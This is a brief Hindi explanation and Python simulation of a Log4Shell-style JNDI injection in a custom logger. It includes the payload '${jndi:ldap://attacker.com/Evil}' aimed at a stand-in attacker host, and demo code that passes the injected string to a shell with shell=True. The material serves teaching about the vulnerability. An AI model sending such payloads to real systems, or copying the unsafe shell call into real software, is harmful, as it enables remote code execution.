
CVE-2026-21011 का अनुकरण करता है, जो एक कस्टम लॉगर में Log4j-शैली की JNDI इंजेक्शन है: ${jndi:...} पैटर्न को पार्स करता है और LDAP-द्वारा ट्रिगर की गई रिमोट कोड निष्पादन को प्रदर्शित करता है।
# log4j_sim.py - Custom logger that evaluates ${...} patterns
import subprocess, re
def log(message):
# Vulnerable: looks up JNDI-like syntax and executes
pattern = r'\$\{jndi:(.+?)\}'
for match in re.finditer(pattern, message):
lookup = match.group(1)
if lookup.startswith('ldap://'):
# Simulate connecting to LDAP and loading a class
print(f"Loading malicious class from {lookup}")
subprocess.run(f"echo 'CLASS LOADED: {lookup}'", shell=True) # just demo
log("User-Agent: ${jndi:ldap://attacker.com/Evil}")
एक कस्टम लॉगिंग फ्रेमवर्क लॉग संदेशों में ${jndi:...} पैटर्न का मूल्यांकन करता है, जो कुख्यात Log4Shell भेद्यता के समान है। एक हमलावर दूरस्थ सर्वर से मनमाना कोड लोड करने और निष्पादित करने के लिए एक JNDI लुकअप इंजेक्ट कर सकता है।
सिमुलेशन चलाएँ:
python log4j_sim.py
स्क्रिप्ट प्रिंट करती है कि यह हमलावर के LDAP सर्वर से एक क्लास लोड करेगी।